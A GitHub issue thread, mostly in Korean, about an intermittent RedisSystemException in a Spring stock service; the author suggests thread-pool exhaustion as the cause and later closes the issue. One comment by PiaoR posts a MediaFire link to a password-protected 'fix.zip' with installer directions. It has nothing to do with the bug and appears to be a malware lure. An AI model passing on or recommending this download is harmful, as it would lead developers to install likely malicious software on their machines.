### ISSUE TITLE
[Spring-production-redis-stockservice] RedisSystemException - Redis command interrupted

### ISSUE THREAD

**Issue by Lcrescent3es** [100-hours-a-week/5-team-HRTH-ustock-be#103]
##  버그 설명

버그에 대한 명확하고 간결한 설명해주세요.

- stockservice - getCurrentChangeChangeRate() 메서드 실행 중 redisTemplate.get() 코드에서 발생
- Event ID: 635a8e71 Aug 28, 5:34 AM

## 재현하는 방법

동작을 재현하는 단계:

- 아직 원인 파악 못함

## 예상한 동작

예상했던 일에 대한 명확하고 간결한 설명해주세요.

- 값을 찾지 못하거나 예외가 발생하면 null 반환, null 반환시 예외처리

## 스크린샷 (옵션)

[센트리](https://ustock-p0.sentry.io/issues/5765728393/?project=4507837264035840&query=is%3Aunresolved+issue.priority%3A%5Bhigh%2C+medium%5D&referrer=issue-stream&stream_index=0)

## 데스크톱(다음 정보를 작성해 주세요):

- OS: [예) iOS]
- Browser [예) chrome, safari]
- Version [예) 22]

## 추가적인 내용 (옵션):

여기에 문제에 대한 다른 컨텍스트를 추가해주세요.

**Comment by Lcrescent3es** [comment]
실제 발생 시간: 14:34
추측되는 원인
1. spring threadpool runout (크론잡의 thread.sleep()으로 인한 간헐적 현상)
2. Elasticache 서버 오류 (거의 가능성 X)
3. network 불안정으로 인한 timeout (거의 가능성 X)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lcrescent3es** [comment]
해당 오류가 업데이트 후 한동안 나타나지 않음으로 issue close
